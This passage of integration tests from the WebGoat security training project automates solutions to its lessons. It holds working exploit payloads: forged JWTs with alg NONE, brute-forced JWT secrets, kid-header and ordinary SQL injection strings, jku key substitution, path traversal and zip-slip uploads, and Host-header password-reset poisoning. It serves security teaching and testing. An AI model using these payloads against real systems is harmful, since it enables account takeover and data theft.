.statusCode(302)
.extract()
.cookie("JSESSIONID");
}
webWolfCookie =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.formParam("username", user)
.formParam("password", "password")
.post(new WebWolfUrlBuilder().path("login").build())
.then()
.statusCode(302)
.cookie("WEBWOLFSESSION")
.extract()
.cookie("WEBWOLFSESSION");
}
@AfterEach
public void logout() {
RestAssured.given().when().relaxedHTTPSValidation().get(url("logout")).then().statusCode(200);
}
public void startLesson(String lessonName) {
startLesson(lessonName, false);
}
public void startLesson(String lessonName, boolean restart) {
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url(lessonName + ".lesson.lesson"))
.then()
.statusCode(200);
if (restart) {
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/restartlesson.mvc/%s.lesson".formatted(lessonName)))
.then()
.statusCode(200);
}
}
public void checkAssignment(String url, Map<String, ?> params, boolean expectedResult) {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url)
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(expectedResult));
}
public void checkAssignmentWithPUT(String url, Map<String, ?> params, boolean expectedResult) {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.put(url)
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(expectedResult));
}
public void checkResults(String lesson) {
var result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc/%s.lesson".formatted(lesson)))
.andReturn();
MatcherAssert.assertThat(
result.then().statusCode(200).extract().jsonPath().getList("solved"),
CoreMatchers.everyItem(CoreMatchers.is(true)));
}
public void checkResults() {
var result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc"))
.andReturn();
MatcherAssert.assertThat(
result.then().statusCode(200).extract().jsonPath().getList("solved"),
CoreMatchers.everyItem(CoreMatchers.is(true)));
}
public void checkAssignment(
String url, ContentType contentType, String body, boolean expectedResult) {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(contentType)
.cookie("JSESSIONID", getWebGoatCookie())
.body(body)
.post(url)
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(expectedResult));
}
public void checkAssignmentWithGet(String url, Map<String, ?> params, boolean expectedResult) {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.queryParams(params)
.get(url)
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(expectedResult));
}
public String getWebWolfFileServerLocation() {
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("file-server-location").build())
.then()
.extract()
.response()
.getBody()
.asString();
result = result.replace("%20", " ");
return result;
}
public String webGoatServerDirectory() {
return RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("server-directory"))
.then()
.extract()
.response()
.getBody()
.asString();
}
public void cleanMailbox() {
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.delete(new WebWolfUrlBuilder().path("mail").build())
.then()
.statusCode(HttpStatus.ACCEPTED.value());
}
}

304
src/it/java/org/owasp/webgoat/integration/JWTLessonIntegrationTest.java Normal file
View File

@ -0,0 +1,304 @@
package org.owasp.webgoat.integration;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.node.ObjectNode;
import io.jsonwebtoken.Header;
import io.jsonwebtoken.JwsHeader;
import io.jsonwebtoken.Jwt;
import io.jsonwebtoken.JwtException;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import io.jsonwebtoken.impl.TextCodec;
import io.restassured.RestAssured;
import java.io.IOException;
import java.nio.charset.Charset;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.interfaces.RSAPublicKey;
import java.time.Instant;
import java.util.Base64;
import java.util.Calendar;
import java.util.Date;
import java.util.HashMap;
import java.util.Map;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.jose4j.jwk.JsonWebKeySet;
import org.jose4j.jwk.RsaJsonWebKey;
import org.junit.jupiter.api.Test;
import org.owasp.webgoat.lessons.jwt.JWTSecretKeyEndpoint;
public class JWTLessonIntegrationTest extends IntegrationTest {
@Test
public void solveAssignment() throws IOException, NoSuchAlgorithmException {
startLesson("JWT");
decodingToken();
resetVotes();
findPassword();
buyAsTom();
deleteTomThroughKidClaim();
deleteTomThroughJkuClaim();
quiz();
checkResults("JWT");
}
private String generateToken(String key) {
return Jwts.builder()
.setIssuer("WebGoat Token Builder")
.setAudience("webgoat.org")
.setIssuedAt(Calendar.getInstance().getTime())
.setExpiration(Date.from(Instant.now().plusSeconds(60)))
.setSubject("tom@webgoat.org")
.claim("username", "WebGoat")
.claim("Email", "tom@webgoat.org")
.claim("Role", new String[] {"Manager", "Project Administrator"})
.signWith(SignatureAlgorithm.HS256, key)
.compact();
}
private String getSecretToken(String token) {
for (String key : JWTSecretKeyEndpoint.SECRETS) {
try {
Jwt jwt = Jwts.parser().setSigningKey(TextCodec.BASE64.encode(key)).parse(token);
} catch (JwtException e) {
continue;
}
return TextCodec.BASE64.encode(key);
}
return null;
}
private void decodingToken() {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParam("jwt-encode-user", "user")
.post(url("JWT/decode"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void findPassword() {
String accessToken =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("JWT/secret/gettoken"))
.then()
.extract()
.response()
.asString();
String secret = getSecretToken(accessToken);
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParam("token", generateToken(secret))
.post(url("JWT/secret"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void resetVotes() throws IOException {
String accessToken =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("JWT/votings/login?user=Tom"))
.then()
.extract()
.cookie("access_token");
String header = accessToken.substring(0, accessToken.indexOf("."));
header = new String(Base64.getUrlDecoder().decode(header.getBytes(Charset.defaultCharset())));
String body = accessToken.substring(1 + accessToken.indexOf("."), accessToken.lastIndexOf("."));
body = new String(Base64.getUrlDecoder().decode(body.getBytes(Charset.defaultCharset())));
ObjectMapper mapper = new ObjectMapper();
JsonNode headerNode = mapper.readTree(header);
headerNode = ((ObjectNode) headerNode).put("alg", "NONE");
JsonNode bodyObject = mapper.readTree(body);
bodyObject = ((ObjectNode) bodyObject).put("admin", "true");
String replacedToken =
new String(Base64.getUrlEncoder().encode(headerNode.toString().getBytes()))
.concat(".")
.concat(
new String(Base64.getUrlEncoder().encode(bodyObject.toString().getBytes()))
.toString())
.concat(".")
.replace("=", "");
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.cookie("access_token", replacedToken)
.post(url("JWT/votings"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void buyAsTom() throws IOException {
String header =
new String(
Base64.getUrlDecoder()
.decode("eyJhbGciOiJIUzUxMiJ9".getBytes(Charset.defaultCharset())));
String body =
new String(
Base64.getUrlDecoder()
.decode(
"eyJhZG1pbiI6ImZhbHNlIiwidXNlciI6IkplcnJ5In0"
.getBytes(Charset.defaultCharset())));
body = body.replace("Jerry", "Tom");
ObjectMapper mapper = new ObjectMapper();
JsonNode headerNode = mapper.readTree(header);
headerNode = ((ObjectNode) headerNode).put("alg", "NONE");
String replacedToken =
new String(Base64.getUrlEncoder().encode(headerNode.toString().getBytes()))
.concat(".")
.concat(new String(Base64.getUrlEncoder().encode(body.getBytes())).toString())
.concat(".")
.replace("=", "");
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("Authorization", "Bearer " + replacedToken)
.post(url("JWT/refresh/checkout"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void deleteTomThroughKidClaim() {
Map<String, Object> header = new HashMap();
header.put(Header.TYPE, Header.JWT_TYPE);
header.put(
JwsHeader.KEY_ID,
"hacked' UNION select 'deletingTom' from INFORMATION_SCHEMA.SYSTEM_USERS --");
String token =
Jwts.builder()
.setHeader(header)
.setIssuer("WebGoat Token Builder")
.setAudience("webgoat.org")
.setIssuedAt(Calendar.getInstance().getTime())
.setExpiration(Date.from(Instant.now().plusSeconds(60)))
.setSubject("tom@webgoat.org")
.claim("username", "Tom")
.claim("Email", "tom@webgoat.org")
.claim("Role", new String[] {"Manager", "Project Administrator"})
.signWith(SignatureAlgorithm.HS256, "deletingTom")
.compact();
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.post(url("JWT/kid/delete?token=" + token))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void deleteTomThroughJkuClaim() throws NoSuchAlgorithmException {
KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
keyPairGenerator.initialize(2048);
KeyPair keyPair = keyPairGenerator.generateKeyPair();
var jwks = new JsonWebKeySet(new RsaJsonWebKey((RSAPublicKey) keyPair.getPublic()));
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", "jwks.json", jwks.toJson().getBytes())
.post(new WebWolfUrlBuilder().path("fileupload").build())
.then()
.extract()
.response()
.getBody()
.asString();
Map<String, Object> header = new HashMap();
header.put(Header.TYPE, Header.JWT_TYPE);
header.put(
JwsHeader.JWK_SET_URL,
new WebWolfUrlBuilder().attackMode().path("files/%s/jwks.json", getUser()).build());
String token =
Jwts.builder()
.setHeader(header)
.setIssuer("WebGoat Token Builder")
.setAudience("webgoat.org")
.setIssuedAt(Calendar.getInstance().getTime())
.setExpiration(Date.from(Instant.now().plusSeconds(60)))
.setSubject("tom@webgoat.org")
.claim("username", "Tom")
.claim("Email", "tom@webgoat.org")
.claim("Role", new String[] {"Manager", "Project Administrator"})
.signWith(SignatureAlgorithm.RS256, keyPair.getPrivate())
.compact();
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.post(url("JWT/jku/delete?token=" + token))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void quiz() {
Map<String, Object> params = new HashMap<>();
params.put("question_0_solution", "Solution 1");
params.put("question_1_solution", "Solution 2");
checkAssignment(url("JWT/quiz"), params, true);
}
}

229
src/it/java/org/owasp/webgoat/integration/LabelAndHintIntegrationTest.java Normal file
View File

@ -0,0 +1,229 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import io.restassured.path.json.JsonPath;
import java.io.FileInputStream;
import java.io.InputStream;
import java.util.List;
import java.util.Properties;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
public class LabelAndHintIntegrationTest extends IntegrationTest {
static final String ESCAPE_JSON_PATH_CHAR = "\'";
@Test
public void testSingleLabel() {
Assertions.assertTrue(true);
JsonPath jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", "en")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc"))
.then()
.statusCode(200)
.extract()
.jsonPath();
Assertions.assertEquals(
"Try again: but this time enter a value before hitting go.",
jsonPath.getString(ESCAPE_JSON_PATH_CHAR + "http-basics.close" + ESCAPE_JSON_PATH_CHAR));
// check if lang parameter overrules Accept-Language parameter
jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", "en")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc?lang=nl"))
.then()
.statusCode(200)
.extract()
.jsonPath();
Assertions.assertEquals(
"Gebruikersnaam",
jsonPath.getString(ESCAPE_JSON_PATH_CHAR + "username" + ESCAPE_JSON_PATH_CHAR));
jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", "en")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc?lang=de"))
.then()
.statusCode(200)
.extract()
.jsonPath();
Assertions.assertEquals(
"Benutzername",
jsonPath.getString(ESCAPE_JSON_PATH_CHAR + "username" + ESCAPE_JSON_PATH_CHAR));
// check if invalid language returns english
jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", "nl")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc?lang=xx"))
.then()
.statusCode(200)
.extract()
.jsonPath();
Assertions.assertEquals(
"Username", jsonPath.getString(ESCAPE_JSON_PATH_CHAR + "username" + ESCAPE_JSON_PATH_CHAR));
// check if invalid language returns english
jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", "xx_YY")
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/labels.mvc"))
.then()
.statusCode(200)
.extract()
.jsonPath();
Assertions.assertEquals(
"Username", jsonPath.getString(ESCAPE_JSON_PATH_CHAR + "username" + ESCAPE_JSON_PATH_CHAR));
}
@Test
public void testHints() {
JsonPath jsonPathLabels = getLabels("en");
List<String> allLessons =
List.of(
"HttpBasics",
"HttpProxies",
"CIA",
"InsecureLogin",
"Cryptography",
"PathTraversal",
"XXE",
"JWT",
"IDOR",
"SSRF",
"WebWolfIntroduction",
"CrossSiteScripting",
"CSRF",
"HijackSession",
"SqlInjection",
"SqlInjectionMitigations",
"SqlInjectionAdvanced",
"Challenge1");
for (String lesson : allLessons) {
startLesson(lesson);
List<String> hintKeys = getHints();
for (String key : hintKeys) {
String keyValue =
jsonPathLabels.getString(ESCAPE_JSON_PATH_CHAR + key + ESCAPE_JSON_PATH_CHAR);
// System.out.println("key: " + key + " ,value: " + keyValue);
Assertions.assertNotNull(keyValue);
Assertions.assertNotEquals(key, keyValue);
}
}
// Assertions.assertEquals("http-basics.hints.http_basics_lesson.1",
// ""+jsonPath.getList("hint").get(0));
}
@Test
public void testLabels() {
JsonPath jsonPathLabels = getLabels("en");
Properties propsDefault = getProperties("");
for (String key : propsDefault.stringPropertyNames()) {
String keyValue =
jsonPathLabels.getString(ESCAPE_JSON_PATH_CHAR + key + ESCAPE_JSON_PATH_CHAR);
Assertions.assertNotNull(keyValue);
}
checkLang(propsDefault, "nl");
checkLang(propsDefault, "de");
checkLang(propsDefault, "fr");
}
private Properties getProperties(String lang) {
Properties prop = null;
if (lang == null || lang.equals("")) {
lang = "";
} else {
lang = "_" + lang;
}
try (InputStream input =
new FileInputStream("src/main/resources/i18n/messages" + lang + ".properties")) {
prop = new Properties();
// load a properties file
prop.load(input);
} catch (Exception e) {
e.printStackTrace();
}
return prop;
}
private void checkLang(Properties propsDefault, String lang) {
JsonPath jsonPath = getLabels(lang);
Properties propsLang = getProperties(lang);
for (String key : propsLang.stringPropertyNames()) {
if (!propsDefault.containsKey(key)) {
System.err.println("key: " + key + " in (" + lang + ") is missing from default properties");
Assertions.fail();
}
if (!jsonPath
.getString(ESCAPE_JSON_PATH_CHAR + key + ESCAPE_JSON_PATH_CHAR)
.equals(propsLang.get(key))) {
System.out.println(
"key: " + key + " in (" + lang + ") has incorrect translation in label service");
System.out.println(
"actual:" + jsonPath.getString(ESCAPE_JSON_PATH_CHAR + key + ESCAPE_JSON_PATH_CHAR));
System.out.println("expected: " + propsLang.getProperty(key));
System.out.println();
Assertions.fail();
}
}
}
private JsonPath getLabels(String lang) {
return RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.header("Accept-Language", lang)
.cookie("JSESSIONID", getWebGoatCookie())
// .log().headers()
.get(url("service/labels.mvc"))
.then()
// .log().all()
.statusCode(200)
.extract()
.jsonPath();
}
private List<String> getHints() {
JsonPath jsonPath =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.contentType(ContentType.JSON)
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/hint.mvc"))
.then()
// .log().all()
.statusCode(200)
.extract()
.jsonPath();
return jsonPath.getList("hint");
}
}

147
src/it/java/org/owasp/webgoat/integration/PasswordResetLessonIntegrationTest.java Normal file
View File

@ -0,0 +1,147 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.DynamicTest.dynamicTest;
import io.restassured.RestAssured;
import java.util.Arrays;
import java.util.Map;
import org.apache.commons.lang3.StringUtils;
import org.assertj.core.api.Assertions;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory;
import org.springframework.http.HttpHeaders;
public class PasswordResetLessonIntegrationTest extends IntegrationTest {
@BeforeEach
public void init() {
startLesson("PasswordReset");
}
@TestFactory
Iterable<DynamicTest> passwordResetLesson() {
return Arrays.asList(
dynamicTest("assignment 6 - check email link", () -> sendEmailShouldBeAvailableInWebWolf()),
dynamicTest("assignment 6 - solve assignment", () -> solveAssignment()),
dynamicTest("assignment 2 - simple reset", () -> assignment2()),
dynamicTest("assignment 4 - guess questions", () -> assignment4()),
dynamicTest("assignment 5 - simple questions", () -> assignment5()));
}
public void assignment2() {
checkAssignment(
url("PasswordReset/simple-mail/reset"),
Map.of("emailReset", this.getUser() + "@webgoat.org"),
false);
checkAssignment(
url("PasswordReset/simple-mail"),
Map.of(
"email",
this.getUser() + "@webgoat.org",
"password",
StringUtils.reverse(this.getUser())),
true);
}
public void assignment4() {
checkAssignment(
url("PasswordReset/questions"),
Map.of("username", "tom", "securityQuestion", "purple"),
true);
}
public void assignment5() {
checkAssignment(
url("PasswordReset/SecurityQuestions"),
Map.of("question", "What is your favorite animal?"),
false);
checkAssignment(
url("PasswordReset/SecurityQuestions"),
Map.of("question", "What is your favorite color?"),
true);
}
public void solveAssignment() {
// WebGoat
clickForgotEmailLink("tom@webgoat-cloud.org");
// WebWolf
var link = getPasswordResetLinkFromLandingPage();
// WebGoat
changePassword(link);
checkAssignment(
url("PasswordReset/reset/login"),
Map.of("email", "tom@webgoat-cloud.org", "password", "123456"),
true);
}
public void sendEmailShouldBeAvailableInWebWolf() {
clickForgotEmailLink(this.getUser() + "@webgoat.org");
var responseBody =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("mail").build())
.then()
.extract()
.response()
.getBody()
.asString();
Assertions.assertThat(responseBody).contains("Hi, you requested a password reset link");
}
@AfterEach
public void shutdown() {
// this will run only once after the list of dynamic tests has run, this is to test if the
// lesson is marked complete
checkResults("PasswordReset");
}
private void changePassword(String link) {
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams("resetLink", link, "password", "123456")
.post(url("PasswordReset/reset/change-password"))
.then()
.statusCode(200);
}
private String getPasswordResetLinkFromLandingPage() {
var responseBody =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("requests").build())
.then()
.extract()
.response()
.getBody()
.asString();
int startIndex = responseBody.lastIndexOf("/PasswordReset/reset/reset-password/");
var link =
responseBody.substring(
startIndex + "/PasswordReset/reset/reset-password/".length(),
responseBody.indexOf(",", startIndex) - 1);
return link;
}
private void clickForgotEmailLink(String user) {
RestAssured.given()
.when()
.header(HttpHeaders.HOST, String.format("%s:%s", "127.0.0.1", getWebWolfUrlConfig().port()))
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams("email", user)
.post(url("PasswordReset/ForgotPassword/create-password-reset-link"))
.then()
.statusCode(200);
}
}

152
src/it/java/org/owasp/webgoat/integration/PathTraversalIntegrationTest.java Normal file
View File

@ -0,0 +1,152 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.DynamicTest.dynamicTest;
import io.restassured.RestAssured;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.Map;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
import lombok.SneakyThrows;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory;
import org.junit.jupiter.api.io.TempDir;
import org.springframework.security.core.token.Sha512DigestUtils;
class PathTraversalIT extends IntegrationTest {
@TempDir Path tempDir;
private File fileToUpload = null;
@BeforeEach
@SneakyThrows
public void init() {
fileToUpload = Files.createFile(tempDir.resolve("test.jpg")).toFile();
Files.write(fileToUpload.toPath(), "This is a test".getBytes());
startLesson("PathTraversal");
}
@TestFactory
Iterable<DynamicTest> testPathTraversal() {
return Arrays.asList(
dynamicTest("assignment 1 - profile upload", () -> assignment1()),
dynamicTest("assignment 2 - profile upload fix", () -> assignment2()),
dynamicTest("assignment 3 - profile upload remove user input", () -> assignment3()),
dynamicTest("assignment 4 - profile upload random pic", () -> assignment4()),
dynamicTest("assignment 5 - zip slip", () -> assignment5()));
}
private void assignment1() throws IOException {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFile", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
.param("fullName", "../John Doe")
.post(url("PathTraversal/profile-upload"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void assignment2() throws IOException {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFileFix", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
.param("fullNameFix", "..././John Doe")
.post(url("PathTraversal/profile-upload-fix"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void assignment3() throws IOException {
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.multiPart(
"uploadedFileRemoveUserInput",
"../test.jpg",
Files.readAllBytes(fileToUpload.toPath()))
.post(url("PathTraversal/profile-upload-remove-user-input"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
private void assignment4() throws IOException {
var uri = "PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2Fpath-traversal-secret";
RestAssured.given()
.urlEncodingEnabled(false)
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url(uri))
.then()
.statusCode(200)
.body(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer"));
checkAssignment(
url("PathTraversal/random"),
Map.of("secret", Sha512DigestUtils.shaHex(this.getUser())),
true);
}
private void assignment5() throws IOException {
var webGoatHome = webGoatServerDirectory() + "PathTraversal/" + this.getUser();
webGoatHome =
webGoatHome.replaceAll("^[a-zA-Z]:", ""); // Remove C: from the home directory on Windows
var webGoatDirectory = new File(webGoatHome);
var zipFile = new File(tempDir.toFile(), "upload.zip");
try (var zos = new ZipOutputStream(new FileOutputStream(zipFile))) {
ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory + "/image.jpg");
zos.putNextEntry(e);
zos.write("test".getBytes(StandardCharsets.UTF_8));
}
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.multiPart("uploadedFileZipSlip", "upload.zip", Files.readAllBytes(zipFile.toPath()))
.post(url("PathTraversal/zip-slip"))
.then()
.log()
.all()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
@AfterEach
void shutdown() {
// this will run only once after the list of dynamic tests has run, this is to test if the
// lesson is marked complete
checkResults("PathTraversal");
}
}

57
src/it/java/org/owasp/webgoat/integration/ProgressRaceConditionIntegrationTest.java Normal file
View File

@ -0,0 +1,57 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import io.restassured.response.Response;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import org.assertj.core.api.Assertions;
import org.junit.jupiter.api.Test;
public class ProgressRaceConditionIntegrationTest extends IntegrationTest {
@Test
public void runTests() throws InterruptedException {
int NUMBER_OF_CALLS = 40;
int NUMBER_OF_PARALLEL_THREADS = 5;
startLesson("Challenge1");
Callable<Response> call =
() -> {
// System.out.println("thread "+Thread.currentThread().getName());
return RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(Map.of("flag", "test"))
.post(url("challenge/flag/1"));
};
ExecutorService executorService = Executors.newFixedThreadPool(NUMBER_OF_PARALLEL_THREADS);
List<? extends Callable<Response>> flagCalls =
IntStream.range(0, NUMBER_OF_CALLS).mapToObj(i -> call).collect(Collectors.toList());
var responses = executorService.invokeAll(flagCalls);
// A certain amount of parallel calls should fail as optimistic locking in DB is applied
long countStatusCode500 =
responses.stream()
.filter(
r -> {
try {
// System.err.println(r.get().getStatusCode());
return r.get().getStatusCode() != 200;
} catch (InterruptedException | ExecutionException e) {
// System.err.println(e);
throw new IllegalStateException(e);
}
})
.count();
System.err.println("counted status 500: " + countStatusCode500);
Assertions.assertThat(countStatusCode500)
.isLessThanOrEqualTo((NUMBER_OF_CALLS - (NUMBER_OF_CALLS / NUMBER_OF_PARALLEL_THREADS)));
}
}

25
src/it/java/org/owasp/webgoat/integration/SSRFIntegrationTest.java Normal file
View File

@ -0,0 +1,25 @@
package org.owasp.webgoat.integration;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class SSRFIntegrationTest extends IntegrationTest {
@Test
public void runTests() {
startLesson("SSRF");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("url", "images/jerry.png");
checkAssignment(url("SSRF/task1"), params, true);
params.clear();
params.put("url", "http://ifconfig.pro");
checkAssignment(url("SSRF/task2"), params, true);
checkResults("SSRF");
}
}

45
src/it/java/org/owasp/webgoat/integration/SessionManagementIntegrationTest.java Normal file
View File

@ -0,0 +1,45 @@
/*
* This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
*
* Copyright (c) 2002 - 2021 Bruce Mayhew
*
* This program is free software; you can redistribute it and/or modify it under the terms of the
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this program; if
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
* 02111-1307, USA.
*
* Getting Source
* ==============
*
* Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/
package org.owasp.webgoat.integration;
import java.util.Map;
import org.junit.jupiter.api.Test;
/**
* @author Angel Olle Blazquez
*/
class SessionManagementIT extends IntegrationTest {
private static final String HIJACK_LOGIN_CONTEXT_PATH = "HijackSession/login";
@Test
void hijackSessionTest() {
startLesson("HijackSession");
checkAssignment(
url(HIJACK_LOGIN_CONTEXT_PATH),
Map.of("username", "webgoat", "password", "webgoat"),
false);
}
}

61
src/it/java/org/owasp/webgoat/integration/SqlInjectionAdvancedIntegrationTest.java Normal file
View File

@ -0,0 +1,61 @@
package org.owasp.webgoat.integration;
import java.util.HashMap;
import java.util.Map;
import org.junit.jupiter.api.Test;
public class SqlInjectionAdvancedIntegrationTest extends IntegrationTest {
@Test
public void runTests() {
startLesson("SqlInjectionAdvanced");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username_reg", "tom' AND substring(password,1,1)='t");
params.put("password_reg", "password");
params.put("email_reg", "someone@microsoft.com");
params.put("confirm_password", "password");
checkAssignmentWithPUT(url("SqlInjectionAdvanced/challenge"), params, true);
params.clear();
params.put("username_login", "tom");
params.put("password_login", "thisisasecretfortomonly");
checkAssignment(url("SqlInjectionAdvanced/challenge_Login"), params, true);
params.clear();
params.put("userid_6a", "'; SELECT * FROM user_system_data;--");
